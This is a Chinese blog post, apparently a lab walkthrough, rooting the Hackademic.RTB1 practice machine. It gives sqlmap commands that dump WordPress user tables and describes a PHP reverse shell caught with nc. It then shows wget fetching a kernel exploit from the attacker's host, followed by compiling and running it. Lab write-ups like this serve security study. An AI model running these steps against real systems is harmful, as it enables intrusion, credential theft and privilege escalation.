freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

靶场练习之Hackademic.RTB1
kana233 2023-10-31 11:37:00 82617

直接开干

一:扫描

1698713731_654050839f1945b27da68.png!small?1698713732048

敏感目录扫了,没扫出来

二:试探

先随便看看

22端口不让用,那就先看看80,先访问

1698714411_6540532bb2f6b65403040.png!small?1698714433063

有提示,带一下Please go to your target and try to get root.这一行的target

根据提示,是让我们找root目录下面的Key.txt

那些紫色的看着想超链接,点一点

点posted in Uncategorized这一行的Uncategorized,查看url,看着像sql注入1698714532_654053a40f31debcdb635.png!small?1698714552561

加个单引号

1698716663_65405bf75a530d2941fa4.png!small?1698716672491

可以sqlmap了

三:开淦

1.看所有数据库

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 --dbs

1698716682_65405c0a4a93c25bdb824.png!small?1698716682442

看到wordpress了

网上搜一下他的后台地址

IP地址/Hackademic_RTB1/wp-admin/

再看sqlmap

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress --tables1698717131_65405dcb805c408653b05.png!small?1698717151833sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns

1698717945_654060f976c1ed2cdf4d7.png!small?1698717964716

sqlmap -u http://192.168.121.142/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump  懒得选,全下吧。密码加密了的,用sqlmap可以解

1698718440_654062e80ff31ebd7ac49.png!small?1698718454280知道密码了,登录。这里面有个权限最高的(怎么判断?有个user_level字段,还可以一个一个登录试,高权限的登录后界面不一样)GeorgeMiller

1698718784_654064401fd7b0ac629bf.png!small?1698718805464

新建一个php文件,写个反弹shell。不会可以工具生成,hack-tools扩展(但会报毒),可以在线网站(棱角社区)

传上去后,先打开nc,监听端口,然后访问反弹shell的页面,上传地址在最开始登录后设置了的,php传不上的看也看前面设置是否允许php上传。

使用uname -a,可以看见内核版本是2.6.31

再开个窗口输入:searchsploit linux 2.6.3

一个一个试,我用的15285

下载后上传到受害机(kali用python开http),受害机用wget下载,然后增加x权限,编译,运行。

python3 -m http.server 80   (kali开http)

wget http://IP/15285.c (以下在受害机的shell执行)

chmod +x 15285.c

gcc 15285.c -o 15285

./15285

完事

# 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 kana233 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
kana233 LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 0 关注者